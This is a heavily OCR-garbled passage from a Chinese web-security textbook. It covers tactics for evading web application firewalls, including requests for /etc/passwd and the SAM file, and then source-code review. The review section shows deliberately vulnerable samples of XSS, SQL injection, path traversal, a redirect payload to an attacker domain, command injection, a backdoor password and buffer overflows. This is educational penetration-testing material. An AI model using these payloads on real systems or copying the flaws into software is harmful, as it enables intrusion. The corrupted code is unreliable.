不 能 防御 我 们 在 第 4 一 8 章 中 讨论 的 任何 漏洞 ， 并 且 在 防范 业务 逻辑 中 的 
潜在 漏洞 〈 第 11 章 ) 方面 也 没有 任何 实际 用 途 。 同 时 ， 它 们 也 无 法 防范 
某 些 特定 的 攻击 ， 如 基于 DOM 的 XSS (第 12 章 ) 。 至 于 其 他 漏洞 〈 利 用 
这 些 漏洞 的 攻击 会 表现 出 某 种 攻击 模式 ) ， 以 下 问题 通常 会 降低 Web 应 
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口 如 果 防 火 墙 过 于 严格 地 遵循 HITP 规 范 ， 它 可 能 会 对 应 用 程序 服 
务 器 如 何 处 理 请 求 做 出 假设 。 相 反 ， 网 络 层 防御 中 的 防火 墙 或 [DS 设备 
通常 并 不 了 解 某 些 HITTP 传 输 方法 的 细节 。 

口 请 求 通过 防火 墙 后 ， 在 处 理 请 求 的 过 程 中 ， 应 用 程序 服务 器 本 喘 
可 能 会 修改 用 户 输入 ， 如 对 其 进行 解码 、 添 加 转 义 字符 ， 或 过 滤 掉 特定 
字符 串 。 前 几 章 中 介绍 的 许多 攻击 步骤 均 以 避 开 输入 确认 为 目标 ， 应 用 
程序 层 防 火 墙 可 能 易于 受到 类 似 的 攻击 。 

口 许 多 防火 墙 和 IDS 和 警报 基于 特定 的 常见 攻击 有 效 载 人 三， 而 不 是 基 
于 利用 漏洞 的 常规 方法 。 如 果 攻 击 者 能 够 检索 文件 系统 中 的 任意 文件 ， 
针对 /managerviewtempl?loc=/etc/passwd 的 请 求 可 能 会 被 阻止 ， 但 针 
对 /managerviewtempl?loc=/varvlog/syslog 的 请 求 并 不 会 被 视 为 攻击 ， 即 
使 其 内 容 可 能 对 攻击 者 更 加 有 用 。 

从 整体 看 ， 我 们 并 不 需要 区 分 全 局 输入 确认 过 滤器 、 基 于 主机 的 代 
理 或 基于 网 络 的 Web 应 用 程序 防火 场 。 以 下 步骤 适用 于 所 有 设备 。 


























渗透 测试 步 又 


可 以 使 用 以 下 步骤 推断 是 否 安 装 了 Web 应 用 程序 防火 墙 。 

(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载 从 回应 用 程序 (最 好 
是 啊 应 中 包含 名 称 或 值 的 某 个 应 用 程序 位 置 ) 提交 任意 参数 名 称 。 
如 果 应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 所 致 。 

C2) 如 果 可 以 提交 在 服务 器 啊 应 中 返回 的 变量 ， 则 提供 一 系 
列 模糊 测试 字符 串 及 这 些 字 符 串 的 编码 形式 可 以 确定 应 用 程序 的 用 
户 输 入 防御 行为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

年 莹 试 避 开 Web 应 用 程序 防火 墙 时 ， 可 以 提交 以 下 字符 串 。 

C1) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 
中 不 可 能 存在 的 民 性 字符 串 作 为 有 效 载荷 。 根 据 定 义 ， 我 们 不 可 能 
提供 这 些 字 符 串 的 示例 。 但 是 ， 在 进行 文件 检索 时 ， 应 避免 
将 /etc/passwd 或 /windows/system32/config/sam 作 为 有 效 载 荷 。 此 
外 ， 应 在 XSS 攻 击 中 避免 使 用 <script>， 并 避免 将 alert0) 或 xss 用 作 
XSS 有 效 载荷 。 

(2) 如 果 特 定 请 求 被 阻止 ， 可 以 尝试 在 其 他 位 置 或 上 下 文中 
提交 相同 的 参数 。 例 如 ， 在 GET 请 求 的 URL 中 、 在 POST 请 求 主体 
中 ， 以 及 在 POST 请 求 的 UREL 中 提交 相同 的 参数 。 

(3) 此 外 ， 应 尝试 在 ASP.NET 上 将 参数 作为 cookie 提 交 。 如 果 
在 查询 字符 串 或 消息 主体 中 找 不 到 参数 foo，API 
Request.Params[“foo”] 会 检索 名 为 foo 的 cookie 的 值 。 

(4) 回顾 第 4 章 中 介绍 的 引入 用 户 输入 的 所 有 其 他 方法 ， 选 择 
其 中 任何 不 受 保护 的 方法 。 

(5) 确定 以 非 标 准 格式 (如 序列 化 或 编码 ) 或 可 能 以 此 类 格 
式 提交 用 户 输 入 的 位 置 。 如 果 找 不 到 此 类 位 置 ， 可 以 通过 串联 字符 
串 和 /或 将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。〔 注 意 ， 
如 果 目 标 是 ASP.NET， 可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串 
联 攻击 字符 串 。) 


许多 部 罗 了 Web 应 用 程序 防火 墙 或 IDS 的 组 织 并 没有 根据 本 市 介绍 
的 方法 对 防御 设备 进行 有 和 针对 性 的 测试 ， 因 此 ， 在 针对 此 类 设备 实施 攻 




















18.4 小结 


与 Web 应 用 程序 上 运行 的 其 他 组 件 一 样 ，Web 服 务 絮 也 是 一 个 重要 
的 受 攻击 面 ， 通 过 它 攻 击 者 可 以 攻破 整个 应 用 程序 。Web 服 务 需 中 的 漏 
洞 可 使 攻击 者 访问 目录 列表 、 可 执行 页 面 的 源 代码 、 敏 感 配置 和 运行 时 
间 数 据 ， 并 避 开 输入 过 小， 直接 威胁 应 用 程序 的 安全 。 

由 于 存在 大 量 各 种 各 样 的 web 服务 顺产 品 与 版 本 ， 碍 找 Web 服 务 器 
漏洞 往往 需要 我 们 进行 一 定 程度 的 探索 与 研究 。 但 是 ， 使 用 上 自动 化 扫 插 
工具 可 以 迅速 高 效 地 确定 所 攻击 的 服务 器 的 配置 与 软件 中 的 任何 已 知 漏 
洞 。 











18.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh. 
(1) 在 什么 情况 下 Web 服 务 器 会 显示 目录 列表 ? 
(2) WebDAV 方 法 有 什么 作用 ?为 什么 说 它们 会 造成 危险 ? 
(3) 如 何 利用 一 个 配置 成 Web 代 理 服务 器 的 Web 服 务 器 ? 
(4) 何 为 Oracle PL/SQL 排 除 列表 ?如 何 避 开 这 个 列表 ? 
(5) 如 果 一 个 Web 服 务 器 允许 通过 HTTP 与 HTTPS 访 问 它 的 功能 ， 
当 查 询 漏洞 时 ， 使 用 其 中 一 个 协议 与 使 用 男 一 个 协议 相 比 有 哪些 优点 ? 








迄今 为 上 ， 我 们 介绍 的 攻击 技巧 全 都 需要 与 一 个 正在 运行 的 应 用 
程序 进行 交互 ， 而 且 ， 从 很 大 程度 上 讲 ， 这 些 攻击 主要 由 向 应 用 程序 提 
交 专 门 设计 药 输 入 和 监控 其 确 应 这 两 个 步骤 构成 。 末 章 将 分 析 一 种 蕉 然 
不 同 的 漏洞 查找 方法 ;通过 审查 应 用 程序 的 源 代 码 来 查找 漏洞 。 
在 以 下 各 各 稍 癌 下 ， 审 坦 流 代码 有 及 于 滩 过 测试 员 皮 击 目标 web 

EFF o 
D 二 些 应 用 程序 为 开源 应 用 程序 ， 或 者 使 用 开源 组 件 ， 多 许 从 相关 
资料 库 中 下 载 它们 的 源 代 码 ， 并 从 中 寻找 漏洞。 

口 如 果 在 提供 咨询 服务 时 执行 渗透 测试 ， 应 用 程序 所 有 者 可 能 会 允 
许 查看 应 用 程序 的 源 代码 ， 以 提高 审计 的 效率 。 

避 可 能 在 应 用 程序 中 发 现 允 许 下 载 其 源 代码 的 文件 泄露 漏洞 。 

口 大 多 数 应 用 程序 使 用 某 种 客户 端 代 码 ， 如 Javascript， 不 需要 任何 
权限 即 名 访问 它 。 

人 们 常 党 认为 ， 如 果 想 要 进行 代码 审查 ， 自 身 必须 是 一 名 经 验 丰 富 
的 程序 员 ， 并 深入 了 解 编写 代码 所 使 用 的 语言 。 然 而 ， 事 实 并 非 如 此 。 
一 些 编程 经 验 有 限 的 人 也 能 够 阅读 并 理解 许多 高 级 语言 ， 同 时 ， 在 Web 
应 用 程序 常用 的 各 种 语言 中 ， 许 多 类 型 的 漏洞 的 表现 形式 也 基本 相同 . 
使 用 某 种 常规 方法 就 可 以 完成 绝 大 多 数 的 代码 审查 ， 而 且 还 可 通过 使 用 
说 明 攻 助 理解 所 针对 的 语言 与 环 信使 用 的 相关 语法 及 API。 本 音 将 介绍 
渗透 测试 员 所 需要 的 核心 方法 ， 并 提供 可 能 遇 到 的 一 些 语言 的 使 用 说 
i. 























19.1 RHEAN 


代码 审查 的 方法 很 多 ， 这 些 方法 有 助 于 提高 在 有 限 的 时 间 内 发 现 安 
全 漏洞 的 效率 。 此 外 ， 还 可 以 将 代码 审查 与 其 他 测试 方法 结合 起 来 ， 充 
分 利用 每 种 方法 的 优势 。 





19.1.1 “ZARS AAM 





前 面 各 章 描述 的 攻击 方法 常 被 称 为 黑 盒 〈black-box) 测试 方法 ， 
为 它 主 要 从 外 部 攻击 应 用 程序 ， 并 监控 其 输入 与 输出 ， 而 之 前 并 不 了 解 
它 的 内 部 工作 机 制 。 相 反 ， 白 合 Cwhite-box) 方法 需要 分 析 应 用 程序 的 
内 部 运作 ， 查 阅 所 有 设计 文档 、 源 代码 与 其 他 资料 。 

“和 白 盒 ”代码 审查 可 非常 高 效 地 发 现 应 用 程序 中 存在 的 漏洞 。 在 审查 
源 代码 的 过 程 中 ， 我 们 篆 篆 可 以 迅速 确定 仅 使 用 * 黑 盒 ” 技 巧 很 难 或 需要 
很 长 时 间 才 能 发 现 的 漏洞 。 例 如 ， 通 过 陪读 代码 可 迅速 确定 一 个 可 访问 
er 的 后 门 密码 ， 但 使 用 密码 猜测 攻击 几乎 不 可 能 发 现 这 个 密 

然而 ， 代 码 审查 并 不 能 完全 蔡 代 “ 黑 盒 ”测试 。 当 然 ， 从 某 种 程度 上 
讲 ， 应 用 程序 中 的 全 部 漏洞 都 “存在 于 源 代 码 中 ”: 因此 ， 理 论 上 ， 通 过 
代码 审查 可 以 确定 所 有 这 些 漏洞 。 但 是 ， 使 用 “ 黑 合 ”方法 可 以 更 迅速 、 
高 效 地 发 现 许 多 漏洞 。 举 例 来 说 ， 使 用 第 14 章 描述 的 自动 化 模糊 测试 技 
巧 ， 每 分 钟 可 以 同一 个 应 用 程序 发 送 数 百 个 测试 字符 串 ， 它 们 将 迅速 分 
散 到 所 有 相关 代码 路 径 中 ， 并 立即 返回 啊 应 。 另 外 ， 通 过 辐 每 个 字段 发 
送 常 见 漏洞 的 触发 右 ， 负 党 可 以 在 几 分钟 内 确定 大 量 通 过 代码 审查 需要 
数 天 才能 发 现 的 漏洞 。 而 且 ， 许 多 企业 级 应 用 程序 的 结构 极其 复杂 ， 对 
用 户 提 交 的 输入 进行 多 层 处 理 。 同 时 ， 应 用 程序 在 每 一 个 层面 实施 不 同 
e 一 段 源 代码 中 的 明显 漏洞 可 能 会 被 其 他 地 方 的 代码 完全 
消除 。 

大 多 数 情况 下 , “墨盒 ”与 “ 白 盒 ” 技 巧 可 以 相互 补充 ， 彼 此 强化 。 通 
常 ， 通 过 代码 审查 初步 查 明 一 个 漏洞 后 ， 表 在 一 个 正在 运行 的 应 用 程序 
中 对 其 进行 测试 ， 是 确定 访 漏 洞 是 售 真 实 存在 的 最 简单 、 最 有 效 的 方 
法 。 相 反 ， 在 一 个 正在 运行 的 应 用 程序 中 确定 某 种 反常 行为 后 ， 审 查 相 
关 源 代码 往往 是 确定 其 根本 原因 的 最 佳 途径 。 因 此 ， 如 有 可 能 ， 应 适当 
结合 使 用 “* 黑 盒 ” 与 “ 白 盒 ” 的 技巧 ， 并 根据 实时 测试 过 程 中 应 用 程序 的 反 
常 行为 、 源 代码 的 大 小 与 复杂 程度 ， 调 整 在 每 种 技巧 上 投入 的 时 间 与 精 
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19.1.2 REAN 


任何 功能 比较 强大 的 应 用 程序 都 可 能 包含 成 二 上 万 行 源 代码 ， 许 多 
情况 下 审查 代码 时 间 有 限 ， 可 能 仪 有 几 天 时 间 。 因 此 ， 有 效 代 码 审 碍 的 
一 个 关键 目标 是 ， 在 有 限 的 时 间 与 精力 条 件 下 ， 确 定 尽 可 能 多 的 安全 漏 
洞 。 为 了 实现 这 个 目标 ， 我 们 有 必要 采用 一 种 结构 化 的 方法 ， 使 用 各 种 
技巧 确保 迅速 确定 源 代码 中 存在 的 “明显 漏洞 "， 为 探查 更 微妙 、 更 难 发 
现 的 漏洞 争取 更 多 时 间 。 

根据 我 们 的 经 验 ， 当 审查 Web 应 用 程序 源 代 码 时 ， 使 用 三 重 查找 方 
法 可 迅速 高 效 地 确定 其 中 存在 的 漏洞 。 这 种 方法 由 以 下 3 个 步骤 组 成 。 

(1) 从 进入 点 开始 追踪 用 户 向 应 用 程序 提交 的 数据 ， 审 查 负 责 处 
理 这 些 数据 的 代码 。 

(2) 在 代码 中 搜索 表示 存在 常见 漏洞 的 签名 ， 并 审查 这 些 签名 ， 
确定 某 个 漏洞 是 否 确实 存在 。 

(3) 对 内 在 危险 的 代码 进行 逐 行 审查 ， 理 解 应 用 程序 的 逻辑 ， 并 
确定 其 中 存在 的 所 有 问题 。 需 要 进行 仔细 审查 的 功能 组 件 包括 : 应 用 程 
序 中 的 关键 安全 机 制 ( 验 证 、 会 话 管理 、 访 问 控制 与 任何 应 用 程序 范围 
内 的 输入 确认 ) 、 外 部 组 件 接口 ， 以 及 任何 使 用 本 地 代码 (通常 为 
C/C++) 的 情况 。 

首先 分 析 各 种 常见 的 Web 应 用 程序 漏洞 在 源 代码 中 的 各 种 表现 形 
式 ， 以 及 当 进 行 代码 审查 时 如 何以 最 简单 的 方式 确定 这 些 表现 形式 。 这 
eee a a 

第 B) 步 ] 。 

然后 依次 分 析 一 些 最 流行 的 Web 开 发 语言 ， 确 定 应 用 程序 如 何 获得 
用 户 提 交 的 数据 (通过 请 求 参数 、cookie 等 ) 、 它 如 何 与 用 户 进 行 会 话 
交互 、 每 种 语言 中 存在 潜在 危险 的 API 以 及 每 种 语言 的 配置 与 环境 对 应 
用 程序 安全 的 影响 。 这 将 有 助 于 我 们 从 进入 点 开始 追踪 用 户 向 应 用 程序 
提交 的 数据 [第 (1) 步 】， 并 为 其 他 步骤 提供 每 种 语言 的 参考 。 最 后 
介绍 一 些 进行 代码 审查 的 有 用 工具 。 





















































— 
wy 

> 注解 ， 当 进行 代码 审查 时 ， 应 该 始终 记 住 ， 应 用 程序 可 能 
扩展 了 类 库 与 接口 ， 对 标准 API 调 用 执行 了 包装 器 ， 并 对 安全 性 至 
关 重 要 的 任务 (如 保存 关于 每 个 会 话 的 信息 〉 采用 了 定制 机 制 。 在 








进行 仔细 的 代码 审查 之 前 ， 必 须 了 解 这 些 定 制 的 范围 ， 并 相应 调整 
HATTIE 





许多 类 型 的 Web 应 用 程序 漏洞 在 代码 中 都 有 相对 一 致 的 签名 ; 通 
常 ， 这 表示 通过 迅速 扫描 和 搜索 代码 就 可 以 确定 一 个 应 用 程序 中 存在 的 
大 部 分 漏洞 。 下 面 列举 的 示例 出 现在 各 种 语言 中 ， 但 在 大 多 数 情况 下 ， 
签名 是 不 区 分 语言 的 。 最 重要 的 是 程序 员 采 用 的 编程 技巧 ， 而 不 是 实际 
使 用 的 API 和 语法 。 


19.2.1 路 站 点 脚本 
在 非常 明显 的 XSS 漏 洞 中 ， 用 户 收 到 的 HIML 代 码 的 一 部 分 明显 是 


由 用 户 可 控制 的 数据 构成 的 。 在 下 面 的 代码 中 ，HREF 链 接 的 目标 即 由 
a A 


tring link = "<a href=" + HttpUt , Url Decode (Request .QueryString 








{"refURL"]) + "&SiteTD=" + SireId + "“&Path-" + HttpUriliry.UrlEncode 
{Request.QueryString["Path"]) + "</a>"; 


objCell.innerHtml = link; 


这 时 ， 对 潜在 恶意 的 内 容 进行 HTML 编 码 这 种 阻止 路 站 点 脚本 的 常 
用 方法 ， 并 不 适用 于 生成 的 串联 字符 串 ， 因 为 它 已 经 包含 有 效 的 HTML 
标记 ;任何 净化 数据 的 沦 试 都 会 按 应 用 程序 指定 的 方式 对 HTML 编码 ， 
从 而 中 断 应 用 程序 。 因 此 ， 这 个 示例 肯定 易于 受到 攻击 ， 除 非 在 其 他 地 
方 实 施 了 过 滤 ， 阻 止 了 在 查询 字符 串 中 包含 XSS 的 请 求 。 这 种 使 用 过 滤 
来 阻止 XSS 攻 击 的 方法 往往 存在 缺陷 ， 如 果 采 用 ， 应 对 它 进 行 仔 细 审 
查 ， 以 确定 解决 办 法 〈 请 参阅 第 12 章 了 解 相 关内 容 ) 。 

在 更 加 微妙 的 情况 下 ， 用 户 可 控制 的 数据 用 来 指定 随后 用 于 创建 有 
送 给 用 户 啊 应 的 一 个 变量 值 。 在 下 面 的 示例 中 ， 类 成 员 变 量 m ons 
被 设 定 为 从 请 求 查询 字符 串 中 提取 的 一 个 值 ， 随 后 将 用 于 创建 被 返回 的 
HTML 页 面 的 <title> 元 素 : 

















private void setPageTitle(HttpServletRequest request) throws 


ServletException 


String requestType = request.getParameter("*type"); 
if ("3".equals{requestType) && null!=request.getParameter(”*title")) 


m_pageTitle = request.getParameter("*title*); 


else m vageTitle = "Online banking application’; 


SA BURA, WU DA FA BE eT 
m_pageTitle 变 量 的 处 理 过程 ， 以 及 它 是 如 何 被 合并 到 被 返回 的 页 面 中 
的 ， 以 确定 数据 是 否 为 防止 XSS 攻 击 而 进行 了 适当 的 编码 。 

前 面 的 示例 明确 证 明代 码 审查 在 查找 一 些 漏洞 时 的 重要 作用 。XSS 
漏洞 只 有 在 一 个 不 同 的 参数 〈type) 指定 一 个 特殊 的 值 (3〉 时 才 会 触 
发 。 标 准 的 模糊 测试 与 对 相关 请 求 进行 漏洞 扫 揪 都 无 法 友 现 这 种 漏洞。 


19.2.2 ”SQL 和 注入 


如 果 各 种 人 硬 编码 的 字符 串 与 用 户 可 控制 的 数据 串联 成 一 个 SQL 查 
询 ， 然 后 在 数据 库 内 执行 这 个 人 查询， 那么 最 可 能 出 现 SQL 注 入 漏洞 。 在 
下 面 的 代码 中 ， 碍 询 由 直接 从 请 求 租 询 字 符 串 中 提取 的 数据 构成 : 


as 


uery newStringBuilder("SRLECT name, accno PROM 











StringBuilder Sg 


ThliCustomers WHERE " + Sqlwhere); 


if {Request.QueryString["CID"] != null && 
Request. QueryString["PageId"] == "2") 


{ 
SciQuery.Appena{* AND CustomerID = " 
SaqlQuery .Append {Request .QueryString["CID*].ToString{}); 


) 
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由 SQL 代码 片断 组 成 ， 并 被 源 代 码 引用 ; 因此 ， 寻 找 由 引号 、SQL 关 键 
字 和 空格 组 成 的 适当 模式 可 能 会 有 用 。 例 如 : 


“SELECT 
* INSERT 
"DELETE 
* AND 


在 每 一 种 情况 中 ， 应 该 核实 将 这 些 字符 串 与 用 户 可 控制 的 数据 串联 
是 否 会 引入 SQL 注入 漏洞 。 因 为 SQL 关键 字 区 分 大 小 写 ， 所 以 在 代码 中 
搜索 这 些 关键 字 时 也 应 区 分 大 小 写 。 请 注意 ， 为 减少 错误 警报 ， 这 些 搜 
索 项 后 可 能 附加 了 空格 。 


19.2.3 路径 授 历 


用 户 可 控制 的 输入 未 经 任何 输入 确认 ， 或 者 核实 已 经 选择 一 个 适当 
的 文件 ， 就 被 传送 给 一 个 文件 系统 API， 这 是 路 径 过 历 漏 洞 的 常见 答 
名 。 在 最 第 见 的 情况 下 ， 用 户 数 据 附 加 在 一 个 便 编 码 或 系统 指定 的 目录 
gd 
4 文件 。 例 如: 


public bytel] GetAttachment (HttpRequest Request) 





FileStream fsAttachment = new FPileStream(SpreadsheetPath + 
Ettputility.UrlDeccde (Request .QueryStrine[*AttachName"]), 


FileMode.OGpen, FileAccess.Read, FileShare.Read); 


oytel] cattachment new bytelfsAttachment.Length]; 
fsattacnment .ReadlFileContent, 0, 
Convert.ToInt32(fsAttachment.Length, 


CultureInfo.CurrentCultureé)); 


fsAttacnment.Cclose(}; 


return bAttachment; 


应 对 任何 允许 用 户 上 传 或 下 载 文件 的 应 用 程序 功能 进行 仔细 审 碍 ， 
了 解 它 是 如 何 根据 用 户 提交 的 数据 调用 文件 系统 API 的 ， 并 确定 是 否 可 
以 使 用 专门 设计 的 输入 访问 其 他 位 置 的 文件 。 通 常 ， 通 过 在 代码 中 搜索 
任何 与 文件 名 有 关 的 查询 字符 串 参 数 〈 在 本 例 中 为 AttachName) ， 以 及 
在 相关 语言 中 搜寻 所 有 文件 API 并 检查 提交 它们 的 参数 ， 就 可 以 迅速 确 
定 相 关 的 功能 。《 第 用 语言 中 的 相关 API 列 表 见 后 文 。 ) 














通过 源 代码 中 的 签名 常 可 轻易 确定 各 种 钓鱼 攻击 辣 量 ， 如 任意 重 定 
癌 。 在 下 面 这 个 示例 中 ， 查 询 字 符 串 中 用 户 提交 的 数据 被 用 于 构建 一 个 
URL， 用 户 即 被 重 定向 到 这 个 URL: 


private void handleCancel () 


{ 


httpResponse.Redirect (HttpUtility.UrlDecode (Recuest.QueryString[ 
*reTURL"]) + "&SiteCode=" + 
Request.QueryString["SiteCode"’].ToString() + 
"&UserId=" + Request.QueryString|”UserlId") .ToString({}); 
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询 字 符 串 中 提取 一 个 参数 ， 并 最 终 重 定 向 到 这 个 URL: 


url = document.URL; 





index = url.indexOf('?redir='); 


target = unescape(url.substring(index + 7, url.length)); 
target = unescape (target); 


if ({index = target.indexOf('//')) > 0) { 
target = target.substring (index + 2, target.length); 
index = target.incexOf('/'); 
target = target.substring{index, target.length); 
} 
target = unescape(target); 
document.location = target; 
可 见 ， 这 上段 脚本 的 作者 已 意识 到 ， 该 脚本 可 能 会 成 为 指 癌 外 部 域 的 
一 个 绝对 UREL 的 重 定向 攻击 的 目标 。 该 脚本 检查 重 定 癌 URL 是 否 包含 一 
个 双人 矢 线 〈 像 http:/ 中 一 样 ) ， 如 果 包 含 ， 束 省 略 第 一 个 单 料 线 ， 将 它 
转换 成 一 个 相对 URL。 但 是 ， 当 它 最 后 一 次 调用 unescape O 函数 时 ， 
该 函数 将 对 任何 URL 编 码 的 字符 进行 解码 。 确 认 后 再 执行 规范 化 常常 会 
导致 漏洞 产生 (请 参阅 第 2 间 了解 相 关内 容 ) 。 在 这 个 示例 中 ， 攻 击 者 
可 以 使 用 以 下 查询 字符 串 造 成 一 个 指向 任 音 绝对 URL 的 重 定 问 : 


?redir=http:$25252£%25252 fwahh-attacker.com 











19.2.5 ”OS 命令 注入 


连接 到 外 部 系统 的 代码 中 常常 包含 指示 代码 注入 漏洞 的 签名 。 在 下 
面 的 示例 中 ，message 与 address 参 数 从 用 户 可 控制 的 表单 数据 中 提取 出 
来 ， 然 后 直接 传送 给 UNIX system API: 


void send mail {const char *message, const char *addr) 

f 
char sencGMai Cma[l4096}); 
snorintf(sendMaiilCma, 4096, "echo ‘%s" sendmail %s", message, addr); 
system (sendMailCmd); 


return; 


19.2.6 后门 密码 


除非 被 恶意 程序 员 有 意 隐藏 ， 舍 则 ， 当 审 合 证 书 确认 你 辑 时 ， 用 于 
测试 或 管理 目的 的 后 门 密码 非常 容易 确定 。 例 如 : 
private UserProfile validateUser{String username, String password} 
{ 


UserProfile up = cgetUserProfile(username); 














i£ (checkCredentiais({up, password) 
“oculiomnium".equals (password) ) 


return up; 


return null; 


} 


同样 ， 使 用 这 种 方法 还 可 以 轻易 确定 未 引用 的 函数 与 隐藏 调试 参 








应 对 应 用 程序 使 用 的 任何 本 地 代码 进行 仔细 审查 ， 确 定 可 被 攻击 者 
用 于 执行 任意 代码 的 常见 漏洞 。 

1. 缓冲 区 溢出 漏洞 

这 些 漏洞 钊 党 使 用 一 个 未 经 检查 的 API 实 现 对 缓冲 区 的 操控 。 这 些 
API 数 量 众多 ， 包 括 strcpy、strcat、memcpy 与 Sprintf 以 及 它们 的 wide- 
char 和 其 他 变 体 。 确 定 代 码 中 明显 的 缓冲 区 溢出 漏洞 的 一 种 简单 方法 
是 ， 搜 索 所 有 这 些 API 的 用 法 ， 并 检 实 来 源 缓冲 区 是 否 可 由 用 户 控制 ， 
以 及 代码 是 否 已 经 明确 确定 目标 绥 冲 区 足够 大 ， 能 够 容纳 被 复制 到 它 里 
面 的 数据 《〈 因 为 API 不 会 这 样 做 ) 。 

我 们 可 以 轻易 确定 以 易 受 攻击 的 方式 调用 危险 API 的 做 法 。 在 下 面 
的 示例 中 ， 用 户 可 控制 的 字符 串 pszName 被 复制 到 一 个 固定 大 小 的 栈 组 
锌 区 中 ， 但 之 前 并 没有 检查 该 缓冲 区 是 否 足以 容纳 这 些 字 符 串 : 

















BOOL CALLBACK CFiles::EnumNameProc(LPTSTR pszName) 
{ 
char strFileName [MAX PATH]; 
strcepy(strFileName, pszName}; 


} 


请 注意 ， 以 一 个 安全 的 API 蔡 代 未 经 检查 的 API， 这 种 方法 并 不 能 
保证 缓冲 区 溢出 不 会 友 生 。 有 时 ， 由 于 错误 或 误解 ， 一 个 经 过 检查 的 
API 以 危险 的 方式 被 使 用 ， 以 前 面 漏洞 的 “修复 代码 ”为 例 : 


BOOL CALLBACK CFiles::EnumNameProc(LPTSTR pszName) 
{ 
char strFPileName {MAX PATH]; 
strnepy(strFileName, pszName, strlen(pszName)); 


} 

因此 ， 要 在 代码 中 彻底 搜索 绥 冲 区 洲 出 漏洞 ， 必 须 对 整个 代码 进行 
仔细 地 逐 行 审查 ， 奶 躁 对 用 户 可 控制 的 数据 执行 的 每 一 项 操作 。 

2. 整数 漏洞 

这 些 漏洞 的 表现 形式 各 异 ， 而 且 非 常 难 以 检测 ; 但 有 时 通过 源 代 码 
中 的 签名 却 可 立即 确定 这 类 漏洞 。 

比较 有 符号 与 无 符号 的 整数 时 经 常会 出 现 问题 。 以 下 代码 中 ， 上 一 
个 漏洞 的 “修复 代码 ”对 有 符 写 的 整数 (len) 与 无 符号 的 整数 
(sizeof(strFileName)) 进行 比较 。 如 果 用 户 能 够 使 len 为 负 值 ， 这 个 比 
较 就 会 成 功 进行 ， 而 且 未 经 检查 的 strcpy 仍 会 运行 : 


BOOL CALLBACK CFiles::KnumNameProc({LPTSTR pszName, int len) 














char strFileName [MAX PATH]; 


if {len < sizecf (strFileName)) 


strepy(strFileName, pszName) ; 


3. 格式 化 字符 串 漏洞 

通常 ， 通 过 检查 printf 与 FormatMessage 系 列 函 数 的 用 法 ， 如 果 发 现 
格式 化 字符 串 参 数 并 未 硬 编码 ， 而 是 由 用 户 控 制 ， 就 可 以 立即 确定 这 类 
漏洞 。 以 下 面 这 段 调 用 fprintf 函 数 的 代码 为 例 : 


void logAuthenticationAttempt (char* username); 


char tmp[64]; 
snprintf(tmp, 64, “login attempt for: ts\n", username); 
tmp[63] = 0; 


fprintf{g_logFile, tmp); 
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作 存 在 危险 ， 并 在 代码 中 标注 提示 ， 准 备 以 后 修复 这 个 问题 ， 但 却 从 未 
着 手 修复 ， 这 时 就 会 出 现 以 上 情况 。 另 外 ， 如 果 测 试 时 确定 应 用 程序 存 
在 茶 种 反常 行为 ， 并 将 其 记录 在 注释 中 ， 但 同样 从 未 对 这 种 行为 进行 全 
面 调查 ， 这 时 也 会 出 现 上 面 的 情况 。 例 如 ， 我 们 曾 在 一 个 应 用 程序 的 生 
产 代码 中 过 到 以 下 代码 : 


char buf [200]; // I hope this is big enough 





strcpy (buf, userinput) ; 


在 代码 中 搜索 说 明 常 见 问 题 的 注释 ， 往 往 可 以 迅速 发 现 许多 明显 的 
漏洞 。 下 面 是 一 些 已 证 明 有 用 的 搜索 项 : 
口 bug 
口 problem 
DQ bad 
D hope 
DQ todo 
口 fix 
DQ overflow 
DQ crash 
DQ inject 
Dxss 
LJ trust 











19.3 Java E8 





本 节 主 要 介绍 在 Java 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 
话 交 互 的 方式 、 和 存在 的 潜在 危险 的 API 以 及 与 安全 相关 的 配置 选项 。 














Java 应 用 程序 通过 javax.servlet.http.HttpServletRequest 接 口 获 取 用 户 
提交 的 输入 ， 该 接口 对 javax.servlet.ServletRequest 接 口 进行 了 扩展 。 这 
两 个 接口 中 包含 了 大 量 Web 应 用 程序 用 于 访问 用 户 提 交 的 数据 的 API。 








表 19-1 列 出 的 API 可 用 于 获取 用 户 请 求 中 的 数据 。 





表 19-1 Java 平 台中 用 于 获取 用 户 提 交 的 数据 的 API 


API 
getParameter 
getParameterNames 
getParameterValues 
getParameterMap 
getQueryString 


getHeader 
getHeaders 
getHeaderNames 
getRequestURI 
getRequestURL 
getCookies 


getRequestedSessionId 


getInputStream 


fii R 

以 String 名 称 与 String 值 之 间 映 射 的 形式 保存 
URL 碍 询 字符 串 与 

POST 请 求 主体 中 的 参数 ， 使 用 这 些 API 可 以 访 
问 该 映射 

返回 请 求 中 的 整个 查询 字符 串 ， 可 以 它 代替 
getParameter API 

以 String 名 称 与 String 值 之 间 映 射 的 形式 保存 请 
B K 的 HITP 消 刀 头 ， 使 用 这 些 API 可 以 访问 该 
B 


这 些 API 返 回 请 求 中 的 URL， 包 括 查 询 字 符 串 
返回 Cookie 对 象 的 一 个 数组 ， 其 中 包含 请 求 所 
收 到 的 cookie 人 信息， 包括 
它们 的 名 称 与 值 


在 某 些 情况 下 用 来 替代 getCookies， 返 
中 提交 的 会 话 ID 值 


这 些 API 返 回 客户 端 送出 的 原始 请 求 的 不 同 表 示 


回 在 请 求 





getReader 形式 ， 因 此 可 用 于 访问 其 
他 所 有 API 获 得 的 任何 信息 








getMethod 返回 HTTP 请 求 所 使 用 的 方法 

getProtocol 返回 HTTP 请 求 所 使 用 的 协议 

getServerName 返回 HTTP Host 消 息 头 的 值 

getRemoteUser 如 果 当 前 用 户 通过 验证 ， 这 些 API 返 回 用 户 的 信 


getUserPrincipal A, GFGERA. WRH 
户 可 以 在 自我 注册 过 程 中 选择 自己 的 用 户 名 ， 
这 种 做 法 可 能 会 在 应 用 程 
序 的 处 理 过 程 中 引入 悉 意 输入 


19.3.2 会话 交互 

Java 平 台 应 用 程序 使 用 javax.servlet.http.HttpSession 接 口 保存 和 检索 
